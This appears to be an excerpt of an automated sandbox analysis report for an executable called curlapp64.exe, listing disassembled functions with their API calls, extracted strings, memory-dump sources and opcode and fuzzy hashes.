                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 73155330-278324492
                                                                                                                                                                                                  • Opcode ID: 3c85be3e496a60ef0340868f92c772aec83f154cb93a7fb1b025239883b209ae
                                                                                                                                                                                                  • Instruction ID: c8c1b0507f8b9e6f3f4bc98759babb1508b34a4fe078e088ecac20c5619e9e78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c85be3e496a60ef0340868f92c772aec83f154cb93a7fb1b025239883b209ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05B1AD22B09B8281EF158F25D54427D63A1FB14B95F648632CF9D53B8EEF78E491C320
                                                                                                                                                                                                  Function 00007FF6CF98C3A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-278324492
                                                                                                                                                                                                  • Opcode ID: 401dbfcbf3747e753bd67006277102dad14a52083aa0053e1ec8c08fbb7eb673
                                                                                                                                                                                                  • Instruction ID: ba2b2f4dbf24592c0d63742c3b4b9509fa3afea18556cdb651238eda0b1e58a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 401dbfcbf3747e753bd67006277102dad14a52083aa0053e1ec8c08fbb7eb673
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16B18F62F15A8289EF00DFB5D0503ED2361EB45BA9F105633DEAD67BCEDE28E1858350
                                                                                                                                                                                                  Function 00007FF6CF9BE0BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9BDA08: GetOEMCP.KERNEL32 ref: 00007FF6CF9BDA32
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(?,?,?,?,?,00000000,?,00007FF6CF9BDE85), ref: 00007FF6CF9BE137
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,00000000,?,00007FF6CF9BDE85), ref: 00007FF6CF9BE17B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 546120528-278324492
                                                                                                                                                                                                  • Opcode ID: 73a88ef571080aa4733870155bb5f031d74acc4253291dfdc43cd8b2e5c6c368
                                                                                                                                                                                                  • Instruction ID: 0735f5dbe71a4b307fcd0fd0e8531eb3a6f5adcec5ef4d7ecc9538063b313d9b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73a88ef571080aa4733870155bb5f031d74acc4253291dfdc43cd8b2e5c6c368
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10810262E0C28286FF75AF25A4401B9B7A5FB44742F584536D6CEC369ADE3CF541C320
                                                                                                                                                                                                  Function 00007FF6CF97AD30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: (\d{1,3}\.){3}\d{1,3}$ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-1398037818
                                                                                                                                                                                                  • Opcode ID: 010f7ca6b7e60284b6b46c27e2db4e66d30f16806d60c484d34f4dda69ef35d5
                                                                                                                                                                                                  • Instruction ID: 7477dba45892f4fd0da19f93d50821e6430c3864ae0a7576c29d4dbbb0797265
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 010f7ca6b7e60284b6b46c27e2db4e66d30f16806d60c484d34f4dda69ef35d5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E719B32F05B818AEB14DF61D4506AC73B5FB98759F115236EA8C83B9ADF38D590C350
                                                                                                                                                                                                  Function 00007FF6CF9A7DAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 1467352782-3733052814
                                                                                                                                                                                                  • Opcode ID: fa9c56668ff7342f8887f4681424924f8640ad2fcbb945aeb66669c86d202130
                                                                                                                                                                                                  • Instruction ID: f5de692773bff82ab7f8fa87d09badb400620c54559e8efb42bcf281d0f5a88e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa9c56668ff7342f8887f4681424924f8640ad2fcbb945aeb66669c86d202130
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E671C032D0869286DF618F25905477DBBE0FB05B9AF148135DACC87A8ACF3CD961CB51
                                                                                                                                                                                                  Function 00007FF6CF97C840 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CF97C9DD
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A5B70: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CF9711FF), ref: 00007FF6CF9A5BC0
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A5B70: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CF9711FF), ref: 00007FF6CF9A5C01
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CF97CA81
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ExceptionFileHeaderRaise
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 240014264-278324492
                                                                                                                                                                                                  • Opcode ID: ed8d3e0e25b21a843a34b88bdd1f2fb3f07f9b015be4ef7b2a9ec9c314e859ae
                                                                                                                                                                                                  • Instruction ID: 343f81efd2e03effd3bb77dcbfde559223f3f59de86e768d93c5cabd15246483
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed8d3e0e25b21a843a34b88bdd1f2fb3f07f9b015be4ef7b2a9ec9c314e859ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E951B022A08B8582EB21DF25E4403AEB3A0FB89B85F549132DBCD4764BEF3CD580C350
                                                                                                                                                                                                  Function 00007FF6CF9BDB20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID: $ZYo
                                                                                                                                                                                                  • API String ID: 1807457897-73073439
                                                                                                                                                                                                  • Opcode ID: aeca5786afc18ce39c9c25afb4408be4adbaacf61375f4f1cdb7213d2d27673f
                                                                                                                                                                                                  • Instruction ID: 69705ec0313a9915ec87152fdeb667829e9abbc14cf7fd38906575b8ee0a6330
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aeca5786afc18ce39c9c25afb4408be4adbaacf61375f4f1cdb7213d2d27673f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7151A272A1C6C18BEB218F24E0443AD7BA0F749345F544576E6CD87A9ACF7CD156CB10
                                                                                                                                                                                                  Function 00007FF6CF9A8444 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                                                                  • Opcode ID: 596155c40a8d4c365ea1edc6a1332c0715f3a9774cdc13da868567e95002e52c
                                                                                                                                                                                                  • Instruction ID: edc64689ef5826a817cef21c466b3c9c9deda9096891ccdbe5d4d1fa20c84bd6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 596155c40a8d4c365ea1edc6a1332c0715f3a9774cdc13da868567e95002e52c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76514E32A1974196EA20EF16E14026D77E4FB88B96F145135EF8D87B5ACF38E451CB10
                                                                                                                                                                                                  Function 00007FF6CF996B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-278324492
                                                                                                                                                                                                  • Opcode ID: 1dd463aaaabf0e24399496808c316f412d6251bd6f7e2f8556f74d9a43d382af
                                                                                                                                                                                                  • Instruction ID: 88f26a3ad2b64369925f980f6ae3c3b9ad8940ee00df625b38eae148a30668e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dd463aaaabf0e24399496808c316f412d6251bd6f7e2f8556f74d9a43d382af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41E562A0CB858AEE209F15E05037DA7A1EB857E5F114231EBDD877DEEE2CE581C710
                                                                                                                                                                                                  Function 00007FF6CF9B2FF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                  • API String ID: 3307058713-4127270699
                                                                                                                                                                                                  • Opcode ID: c6a06be8a8fa24f3f24792639dc78f7347afc7f15bdb07778fba461248c64965
                                                                                                                                                                                                  • Instruction ID: 566582d87db597661df402e3f84e8c6bfa5591e6f8a0482b296fe103e77e9c41
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6a06be8a8fa24f3f24792639dc78f7347afc7f15bdb07778fba461248c64965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441B332A08B4286EF24DF26E4404B977A5FF84796B254435ED8E87B4ADE3CE4818320
                                                                                                                                                                                                  Function 00007FF6CF99A6C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 73155330-278324492
                                                                                                                                                                                                  • Opcode ID: 36c65fc87cb8d7e0c534a3ca9835310db7c5b8c274d7cdca7f44af9048334888
                                                                                                                                                                                                  • Instruction ID: 9c1acb2f692e73fd8ca4f4eb2fdd1de6eaa3ad36b2546a4b30f227566154fe45
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36c65fc87cb8d7e0c534a3ca9835310db7c5b8c274d7cdca7f44af9048334888
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31B361F0864289EE28AF1694052BCA3A1EB48BF1F554731DABD877DADE7CE1818310
                                                                                                                                                                                                  Function 00007FF6CF99AD30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: \printui.exe
                                                                                                                                                                                                  • API String ID: 73155330-2025757019
                                                                                                                                                                                                  • Opcode ID: f18ebbe832b9a5d8e26df2fdf01dc76cc07484e0da531c7b73cfe8b601086112
                                                                                                                                                                                                  • Instruction ID: 672fd1dc693d8e9e411cec984abce91adef41dff5e952dfe98e930d3ebf5efae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f18ebbe832b9a5d8e26df2fdf01dc76cc07484e0da531c7b73cfe8b601086112
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4231D432715B868AEE28EF65D0042BDA361EB44BD2F554631CBED877DADE3CD1418310
                                                                                                                                                                                                  Function 00007FF6CF9888B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CF9889F6
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A3B58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CF9A3B88
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A3B58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CF9A3B8E
                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CF988A02
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 4131450254-278324492
                                                                                                                                                                                                  • Opcode ID: f9fba17a4bb80b54406029b51754e7593f8b56aee444d9ee0c1652d54ad26901
                                                                                                                                                                                                  • Instruction ID: 8d6825553de968c301ce01aaa7cdeb16246d935c90d3f2a3bbc45bb81529bc67
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9fba17a4bb80b54406029b51754e7593f8b56aee444d9ee0c1652d54ad26901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C941B632A19B8581EA10DF11E544279B3A5FB487E1F554336EBDD83B9ADF3CE0918320
                                                                                                                                                                                                  Function 00007FF6CF986F1E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: iterator does not fit current value$iterator out of range
                                                                                                                                                                                                  • API String ID: 3668304517-1046077056
                                                                                                                                                                                                  • Opcode ID: 01d1f281ac7da48f37706de959b4f656b5092fad53d3e73080f9185371dbd55b
                                                                                                                                                                                                  • Instruction ID: 6517cef90e8e2e115a916e50eee21e9ec657b4369df62d3c0d02e4798b3b0481
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01d1f281ac7da48f37706de959b4f656b5092fad53d3e73080f9185371dbd55b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F317062A0968692EF10DF10E4502AD6761FB8174AF904033E6CD87AAFDF3CD985C720
                                                                                                                                                                                                  Function 00007FF6CF986F7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: iterator does not fit current value$iterator out of range
                                                                                                                                                                                                  • API String ID: 3668304517-1046077056
                                                                                                                                                                                                  • Opcode ID: 33e2c8a7d215e2ebefc1ec216248bfeca9b128255ed12b1ca1ffc27078cceabc
                                                                                                                                                                                                  • Instruction ID: 891c0966a6f89d0f9c3efde8c3209560013bd605ab62ba4bdc82184550b24579
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33e2c8a7d215e2ebefc1ec216248bfeca9b128255ed12b1ca1ffc27078cceabc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4319062A0964692EF10DF10E4506BD6361FB81346F908433EADD87AAFDF3CE949C720
                                                                                                                                                                                                  Function 00007FF6CF9B6B04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
